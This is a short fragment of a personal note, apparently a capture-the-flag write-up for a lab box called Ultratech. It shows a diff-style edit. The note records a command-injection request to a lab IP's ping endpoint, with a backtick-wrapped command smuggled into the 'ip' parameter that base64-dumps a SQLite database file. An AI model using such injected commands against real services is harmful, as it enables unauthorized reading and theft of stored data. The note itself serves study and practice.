sleeptoken/zettelkasten/Ultratech.md

 10.10.65.179:8081/ping?ip=`base64 -w 0 utech.db.sqlite`
 ```
 `-w 0` to make it all one long line
-save the file with `.b64` extension z
+save the file with `.b64` extension